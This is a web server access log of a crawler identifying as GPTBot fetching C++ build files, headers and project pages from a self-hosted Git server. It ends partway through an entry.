"/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:18:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11615] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:07:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11620] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11615] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11615] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11619] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11094] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11620] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:07:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:07:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp?display=source" [Client 74.7.227.38] [Length 12274] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp" -[17/Feb/2026:18:07:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:07:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13146] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13145] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11042] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:07:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13145] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11042] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13150] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11042] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:18:08:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13146] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:08:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore" -[17/Feb/2026:18:08:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json" -[17/Feb/2026:18:08:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:08:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11613] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:08:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11075] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:08:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:08:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:08:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11616] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:08:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15297] [Gzip 5.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp" -[17/Feb/2026:18:08:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11078] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:08:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:08:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13357] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:08:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:18:08:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13354] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 12408] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11618] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13353] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13352] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 